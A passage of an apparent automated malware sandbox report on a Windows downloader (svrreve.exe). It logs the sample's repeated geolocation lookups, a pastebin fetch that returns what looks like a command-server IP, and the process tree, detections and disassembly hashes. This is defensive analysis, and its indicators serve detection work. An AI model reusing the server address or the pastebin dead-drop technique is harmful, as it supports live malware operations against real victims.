                          2024-06-25 12:55:59 UTC1014INData Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.449749195.201.57.904437536C:\ProgramData\uovan\svrreve.exe
                          TimestampBytes transferredDirectionData
                          2024-06-25 12:56:00 UTC41OUTGET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:56:00 UTC239INHTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:00 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:56:00 UTC1014INData Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.449750195.201.57.904437536C:\ProgramData\uovan\svrreve.exe
                          TimestampBytes transferredDirectionData
                          2024-06-25 12:56:01 UTC41OUTGET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:56:01 UTC239INHTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:01 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:56:01 UTC1014INData Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.449751195.201.57.904437536C:\ProgramData\uovan\svrreve.exe
                          TimestampBytes transferredDirectionData
                          2024-06-25 12:56:02 UTC41OUTGET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:56:02 UTC239INHTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:02 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:56:02 UTC1014INData Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.449752195.201.57.904437536C:\ProgramData\uovan\svrreve.exe
                          TimestampBytes transferredDirectionData
                          2024-06-25 12:56:03 UTC41OUTGET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:56:03 UTC239INHTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:03 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:56:03 UTC1014INData Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.449753195.201.57.904437536C:\ProgramData\uovan\svrreve.exe
                          TimestampBytes transferredDirectionData
                          2024-06-25 12:56:04 UTC41OUTGET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:56:04 UTC239INHTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:04 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:56:04 UTC1014INData Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.449754195.201.57.904437536C:\ProgramData\uovan\svrreve.exe
                          TimestampBytes transferredDirectionData
                          2024-06-25 12:56:05 UTC41OUTGET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:56:05 UTC239INHTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:05 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:56:05 UTC1014INData Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.449755172.67.19.244437536C:\ProgramData\uovan\svrreve.exe
                          TimestampBytes transferredDirectionData
                          2024-06-25 12:56:22 UTC74OUTGET /raw/fR7B5m9E HTTP/1.1
                          Host: pastebin.com
                          Connection: Keep-Alive
                          2024-06-25 12:56:22 UTC388INHTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:22 GMT
                          Content-Type: text/plain; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1;mode=block
                          cache-control: public, max-age=1801
                          CF-Cache-Status: MISS
                          Last-Modified: Tue, 25 Jun 2024 12:56:22 GMT
                          Server: cloudflare
                          CF-RAY: 89951e049efc42d5-EWR
                          2024-06-25 12:56:22 UTC27INData Raw: 31 35 0d 0a 68 74 74 70 3a 2f 2f 31 37 32 2e 38 36 2e 31 30 35 2e 31 30 39 0d 0a
                          Data Ascii: 15http://172.86.105.109
                          2024-06-25 12:56:22 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:08:55:34
                          Start date:25/06/2024
                          Path:C:\Users\user\Desktop\ubes6SC7Vd.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\ubes6SC7Vd.exe"
                          Imagebase:0x258f28f0000
                          File size:1'972'736 bytes
                          MD5 hash:7DDECCF7C147EA2B90426AEB43277096
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1857818205.0000025880001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1687370695.00000258F28F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:2
                          Start time:08:55:51
                          Start date:25/06/2024
                          Path:C:\ProgramData\uovan\svrreve.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\ProgramData\uovan\svrreve.exe"
                          Imagebase:0x26dbeea0000
                          File size:1'972'736 bytes
                          MD5 hash:7DDECCF7C147EA2B90426AEB43277096
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2289800804.0000026DC0DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\uovan\svrreve.exe, Author: Joe Security
                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\uovan\svrreve.exe, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 45%, ReversingLabs
                          • Detection: 56%, Virustotal, Browse
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:3
                          Start time:08:55:51
                          Start date:25/06/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat""
                          Imagebase:0x7ff6d07c0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:08:55:51
                          Start date:25/06/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:08:55:51
                          Start date:25/06/2024
                          Path:C:\Windows\System32\timeout.exe
                          Wow64 process (32bit):false
                          Commandline:timeout 7
                          Imagebase:0x7ff634590000
                          File size:32'768 bytes
                          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:8
                          Start time:08:55:58
                          Start date:25/06/2024
                          Path:C:\Windows\System32\whoami.exe
                          Wow64 process (32bit):true
                          Commandline:whoami
                          Imagebase:0x9b0000
                          File size:73'728 bytes
                          MD5 hash:A4A6924F3EAF97981323703D38FD99C4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:9
                          Start time:08:56:13
                          Start date:25/06/2024
                          Path:C:\ProgramData\uovan\svrreve.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\ProgramData\uovan\svrreve.exe"
                          Imagebase:0x1dd54b90000
                          File size:1'972'736 bytes
                          MD5 hash:7DDECCF7C147EA2B90426AEB43277096
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2301901265.000001DD56A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:12
                          Start time:08:56:15
                          Start date:25/06/2024
                          Path:C:\Windows\System32\WerFault.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7924 -s 820
                          Imagebase:0x7ff697450000
                          File size:570'736 bytes
                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:13
                          Start time:08:56:21
                          Start date:25/06/2024
                          Path:C:\ProgramData\uovan\svrreve.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\ProgramData\uovan\svrreve.exe"
                          Imagebase:0x1b08d950000
                          File size:1'972'736 bytes
                          MD5 hash:7DDECCF7C147EA2B90426AEB43277096
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.2276827527.000001B08F751000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:15
                          Start time:08:56:21
                          Start date:25/06/2024
                          Path:C:\Windows\System32\WerFault.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\WerFault.exe -u -p 8076 -s 832
                          Imagebase:0x7ff697450000
                          File size:570'736 bytes
                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:17
                          Start time:08:56:26
                          Start date:25/06/2024
                          Path:C:\Windows\System32\WerFault.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7536 -s 2476
                          Imagebase:0x7ff697450000
                          File size:570'736 bytes
                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >

                            Executed Functions

                            Function 00007FFD9BA17309 Relevance: .1, Instructions: 146COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4647cfcf0ce73736273d2009fbef239f4adade278d3439e19cc7fff82b9380e1
                            • Instruction ID: c8779990ef80d0b052d0514b1465f737dc5fb918b044620afec07cce6a87a8df
                            • Opcode Fuzzy Hash: 4647cfcf0ce73736273d2009fbef239f4adade278d3439e19cc7fff82b9380e1
                            • Instruction Fuzzy Hash: 705160B090A6898FD745EBA8D469BADBFF0EF16321F4410EED04AEB1B2C66C5845C705
                            Function 00007FFD9BA10D3E Relevance: 1.6, Strings: 1, Instructions: 355COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;/M
                            • API String ID: 0-420482631
                            • Opcode ID: 9dd0610e7521915a687e79ffd6bb443b4e3ce0f437b87a8874d4eb1bd494ceba
                            • Instruction ID: cd88c07f80ee4414906c791241a5fc3a30168144f0a17d6b4a6277cc1b96c20e
                            • Opcode Fuzzy Hash: 9dd0610e7521915a687e79ffd6bb443b4e3ce0f437b87a8874d4eb1bd494ceba
                            • Instruction Fuzzy Hash: 61B1BE6160E9CA6FE742ABB864755E9BFF0DF4B22071805EAC499DF167CA5D6883C300
                            Function 00007FFD9BA105F2 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID: >M_^
                            • API String ID: 0-4160910197
                            • Opcode ID: 98f6ddd64215a2aaa3c6c0c56922073562cc46ce6e44b5a34a9144fe3e4f6677
                            • Instruction ID: 00c8ef06c21e9d9958cc070738f259cdc9cf77f53c345b9805843a513aa8b3fc
                            • Opcode Fuzzy Hash: 98f6ddd64215a2aaa3c6c0c56922073562cc46ce6e44b5a34a9144fe3e4f6677
                            • Instruction Fuzzy Hash: 7651D671A0E94D9FDF91EBACD865AECBBF0FF59310F0401AAD049DB1A2DA756841C740
                            Function 00007FFD9BA152A9 Relevance: .4, Instructions: 352COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6743d4640e44695a2d35c2ab6c827bf8df5fe67e3325e9254dbae855157a3b82
                            • Instruction ID: 7c89f7dade23e6ac22d82660fa7daf116a0ce035b073fc4a8a1fba79718caadf
                            • Opcode Fuzzy Hash: 6743d4640e44695a2d35c2ab6c827bf8df5fe67e3325e9254dbae855157a3b82
                            • Instruction Fuzzy Hash: 28C10B7090E68C5FDB91DFE894666EDBFF1EF5A310F4411AAC08DEB262CA785841C740
                            Function 00007FFD9BA1165D Relevance: .2, Instructions: 224COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fef82b0d5c8c4de9cd77a9654fd7198cf6bc110658489df8b736395b0ccd1570
                            • Instruction ID: 33e7a247c32645c51b9d49ac62fd18f35917654d52186df6a450982f8a676197
                            • Opcode Fuzzy Hash: fef82b0d5c8c4de9cd77a9654fd7198cf6bc110658489df8b736395b0ccd1570
                            • Instruction Fuzzy Hash: 7C81B170A0A55E8FDBA8EF64C4A46F977B0FF65310F0445BAC019D32E1CA78AA85CB40
                            Function 00007FFD9BA10600 Relevance: .1, Instructions: 149COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 56e997a7c3248cfc8d2915e490e8ed942fd0faef7754012f20613ee5fe73a1c6
                            • Instruction ID: fa6dc092b8d49054274356b24696f4d8fdec21faca05bed4eab14992c6b789b9
                            • Opcode Fuzzy Hash: 56e997a7c3248cfc8d2915e490e8ed942fd0faef7754012f20613ee5fe73a1c6
                            • Instruction Fuzzy Hash: 0341D570A0994D8FDF91EBACD469AEDBBF0FF59310F0401AAD049EB1A2DA75A841C740
                            Function 00007FFD9BA15506 Relevance: .1, Instructions: 138COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a34adb739c4e0974e8e7d7237b7df4f9238161bfc872a75e0fbf51025084c97b
                            • Instruction ID: 5790b980c418af5a74c3fb438568364a39f2eb489e9bc583c4eacc7b1b782844
                            • Opcode Fuzzy Hash: a34adb739c4e0974e8e7d7237b7df4f9238161bfc872a75e0fbf51025084c97b
                            • Instruction Fuzzy Hash: 3641557090DA8D9FDB81EBA8C859AED7FF1FF5A310F4500AAD049DB172C6799845C740
                            Function 00007FFD9BA15671 Relevance: .1, Instructions: 131COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a77370db2894ed31b3f7634edafdfcb92de169bc3422484580fe56a7c3c7f386
                            • Instruction ID: f794d55aeb8ccc9c334f2e366cdf6f4d21877c1fe3f2aa4d8e57c347d1845fee
                            • Opcode Fuzzy Hash: a77370db2894ed31b3f7634edafdfcb92de169bc3422484580fe56a7c3c7f386
                            • Instruction Fuzzy Hash: B4410430E0E64D8FDB95DBA8D865AED7BF0FF59310F04117AE049E32A2CA785942C780
                            Function 00007FFD9BA108B5 Relevance: .1, Instructions: 130COMMON
                            Download Yara Rule
                            Memory Dump Source
